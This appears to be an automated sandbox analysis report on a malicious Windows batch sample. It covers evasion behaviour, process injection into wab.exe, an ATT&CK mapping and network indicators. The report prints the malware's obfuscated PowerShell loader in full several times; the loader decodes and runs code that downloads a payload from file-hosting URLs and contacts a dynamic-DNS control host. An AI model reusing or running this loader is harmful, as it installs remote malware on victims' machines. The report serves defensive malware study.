        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: Yara match File source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 2300000 memory reserve | memory write watch
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 23690000 memory reserve | memory write watch
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 234E0000 memory reserve | memory write watch
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4573
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5338
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5650
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4143
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 7007
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2813
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5584 Thread sleep count: 5650 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948 Thread sleep count: 4143 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5276 Thread sleep time: -23058430092136925s >= -30000s
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5324 Thread sleep count: 7007 > 30
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5324 Thread sleep count: 2813 > 30
        Source: C:\Program Files (x86)\Windows Mail\wab.exe File Volume queried: C:\ FullSizeInformation
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000003.00000002.2933062184.0000017BD7B45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match File source: amsi64_5700.amsi.csv, type: OTHER
        Source: Yara match File source: Process Memory Space: powershell.exe PID: 5700, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTR
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3860000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 230F9EC
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$lassoing = 1;$rasophore='sub';$rasophore+='strin';$rasophore+='g';function ugedagens($outdure){$frys=$outdure.length-$lassoing;for($interproducing=5;$interproducing -lt $frys;$interproducing+=6){$unlecherous+=$outdure.$rasophore.invoke( $interproducing, $lassoing);}$unlecherous;}function semuljegrynets($barbarized){. ($adenoncus) ($barbarized);}$currycombing=ugedagens 'chronm,jerno istnzdes ei .rdmlsanktlw llialevul/outca5averr..eman0uforl ort,g(handlwsendei precn,niffd,edeoo bor wdioxas w,gg ko,svncrosstinope overl1 indr0klamm.op.ak0mavel;instr ro ndwnonfaibeg.enflygt6totaq4lufth;bo.ti radixfylgj6 g.nn4tachy;ha ss ek.pr sy.ev lndi: iece1tilst2j ntj1pisto.antid0bavn.)plant oragkibose,odlicre,ulk,verfofli o/succu2n.ntr0pulve1hj.ej0forfa0ubeta1 ekst0 fort1fl,pp leddfrebeditorskrselvgehumatf,robyobarvexskjo /dress1,ydro2urtid1 cent.begal0opera ';$huaco=ugedagens ' zo,luskaloskrnerere rordema,-stormaempreg disselandsnmartetm tap ';$fluernes=ugedagens 'serv hcathatuna tt su,ephe,ges cevi:du,le/sil,n/apprewdiletwa,vaewplkke. milis la,refarmanladeddcrystsnonh.peje.ta niveccurn.ehande.maadgccicerochalomaston/anen,pv.rmtrlyzetoar,th/iodocdlinielkom.e/afskewmulti4homebeetabl2preenq udadb k.st ';$astrographer=ugedagens 'homol>fossi ';$adenoncus=ugedagens 'afmnsi exhoesv,nfxinku. ';$minussernes='olieraffinaderiets';$omskrivelses = ugedagens ' v,rde oplacpopl,hfi ucobronc svog%b.lthakiropp svamp de,adout aau,tryttorrea,push%shodd\syndebs.mshe,aksevsmileosmalngalumitunderepolemsdeam,1cervi4dispe0quadr. me,lo sv tuintegtant.s v,let&st,ll&canto for.oeomlydcstuddhfaktuoamts ordretdire. 
';semuljegrynets (ugedagens 're,et$ lectg direlorthoos rapb tranasequelsmerg:stillare.idpassaypv.rdelblrerafol.euplinksneuroem tenr expls ode=ka.ao( hardcun elmphagodgasco nonre/girl,clikvi jordr$undskomaku mpantos bli k mor.rretsbi forsvcharleh,athlasylssdistieosteostante)udski ');semuljegrynets (ugedagens 'netts$ c.okgelevtlskeigomisemb elvearegovlfa,il:littof pr.moexpanr s brvcons,abesk.ykandi= subp$ hopofbjrgilintegutapp,etoothr.pegenimpe.etegnes hyst.bes as,igtipfunguls,andi u jetdok m(punkt$respea kr.dsadnottg,derrs,mmeozuluegbrom,rs.ranaefterpkonflh fhne.umphrrling) .nsl ');$fluernes=$forvay[0];$underabyss= (ugedagens 'bogka$rygergrugerludsmyooffe bacridaskftelskift:vegetf ga ees.rigepressrblodsi em ee tetr= n.nrn dybte te,swfo,ho-chaveo ymidbh terj ove.erullec kul,tudfri st.tisdiv,rytruansmelilt fabiephilom mark.por.un evocearisttmalap.quentwfupmaespectb encrc infalbese.i.itike partnspiset');$underabyss+=$applausers[1];semuljegrynets ($underabyss);semuljegrynets (ugedagens ' auto$stap fnedere prveedruggrturfsihaplyefogc.. n,tuhtaurieinexhab ndedminice ionirdharasfort [nrtb $op,inhk,nsluokk padusticdressotrukn] moll= .ott$tooticsynaeumascursl tsrc,lebynonlycmerrio eccrmqu tabunabsi,ingenresungcu,pi ');$aktualitetens=ugedagens 'gra.e$ balsfforese f.ageomulcrlaniti
        Source: wab.exe, 0000000A.00000003.2677388479.0000000025739000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3357559154.0000000023721000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2819015436.0000000025753000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
        Source: wab.exe, 0000000A.00000002.3357559154.0000000023721000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTe
        Source: wab.exe, 0000000A.00000002.3357559154.0000000023721000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3357559154.00000000236FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: Yara match | File source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR
        Source: wab.exe, 0000000A.00000002.3359228146.00000000257A0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3343246570.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        ATT&CK matrix, listed by tactic (leading numbers are the counts shown in the original matrix cells):

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
        Execution: 11 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 PowerShell; Launchd; Scheduled Task; Systemd Timers
        Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
        Privilege Escalation: 112 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
        Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 112 Process Injection; 11 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
        Discovery: 21 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 14 System Information Discovery; Remote System Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
        Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
        Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Multiband Communication; Commonly Used Port
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
        Behavior Graph ID: 1446776 | Sample: xff.cmd | Startdate: 23/05/2024 | Architecture: WINDOWS | Score: 100

        Sample (node 2): contacts dhhj.duckdns.org, www.sendspace.com and 2 other IPs or domains; signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures; starts cmd.exe (node 9)
        dhhj.duckdns.org (node 30): Uses dynamic DNS services
        cmd.exe (node 9): Suspicious powershell command line found; Very long command line found; starts powershell.exe (node 12) and conhost.exe (node 16)
        powershell.exe (node 12): connects to fs13n2.sendspace.com 69.31.136.57, 443, 49700 GTT-BACKBONEGTTDE United States and www.sendspace.com 104.21.28.80, 443, 49699, 49708 CLOUDFLARENETUS United States; signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading; starts powershell.exe (node 18), conhost.exe (node 21) and cmd.exe (node 23)
        powershell.exe (node 18): Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; starts wab.exe (node 25) and cmd.exe (node 28)
        wab.exe (node 25): connects to dhhj.duckdns.org 12.202.180.134, 49711, 8797 FISERV-INCUS United States and fs03n5.sendspace.com 69.31.136.17, 443, 49709 GTT-BACKBONEGTTDE United States

        Source | Detection | Scanner | Label | Link
        xff.cmd | 3% | ReversingLabs | |
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
        http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
        http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
        https://go.micro | 0% | URL Reputation | safe
        https://contoso.com/License | 0% | URL Reputation | safe
        https://contoso.com/Icon | 0% | URL Reputation | safe
        https://aka.ms/pscore6lB | 0% | URL Reputation | safe
        https://contoso.com/ | 0% | URL Reputation | safe
        https://nuget.org/nuget.exe | 0% | URL Reputation | safe
        https://aka.ms/pscore68 | 0% | URL Reputation | safe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
        http://www.sendspace.com | 0% | Avira URL Cloud | safe
        https://www.sendspace.com | 0% | Avira URL Cloud | safe
        https://fs13n2.sendspace.com | 0% | Avira URL Cloud | safe
        https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
        https://www.sendspace.com/pro/dl/w4e2qbP | 0% | Avira URL Cloud | safe
        https://fs13n2.sendspace.com/dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla | 0% | Avira URL Cloud | safe
        https://fs03n5.sendspace.com/ | 0% | Avira URL Cloud | safe
        https://www.sendspace.com/pro/dl/w4e2qb | 0% | Avira URL Cloud | safe
        http://fs13n2.sendspace.com | 0% | Avira URL Cloud | safe
        https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold | 0% | Avira URL Cloud | safe
        https://www.sendspace.com/pro/dl/w4e2qbXR | 0% | Avira URL Cloud | safe
        https://fs03n5.sendspace.com/hf | 0% | Avira URL Cloud | safe
        https://fs03n5.sendspace.com/om:443 | 0% | Avira URL Cloud | safe
        https://www.sendspace.com/pro/dl/6f2c5c | 0% | Avira URL Cloud | safe
        https://fs03n5.sendspace.com/79c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin | 0% | Avira URL Cloud | safe
        https://fs13n2.sendspaX | 0% | Avira URL Cloud | safe
        https://www.sendspace.com/ | 0% | Avira URL Cloud | safe
        https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin | 0% | Avira URL Cloud | safe
        dhhj.duckdns.org | 0% | Avira URL Cloud | safe
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        dhhj.duckdns.org | 12.202.180.134 | true | true | | unknown
        fs13n2.sendspace.com | 69.31.136.57 | true | false | | unknown
        fs03n5.sendspace.com | 69.31.136.17 | true | false | | unknown
        www.sendspace.com | 104.21.28.80 | true | false | | unknown
        Name | Malicious | Antivirus Detection | Reputation
        https://fs13n2.sendspace.com/dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla | false | Avira URL Cloud: safe | unknown
        https://www.sendspace.com/pro/dl/w4e2qb | false | Avira URL Cloud: safe | unknown
        https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin | false | Avira URL Cloud: safe | unknown
        dhhj.duckdns.org | true | Avira URL Cloud: safe | unknown
        https://www.sendspace.com/pro/dl/6f2c5c | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://fs03n5.sendspace.com/ | wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000003.00000002.2793992270.0000017BC0A66000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
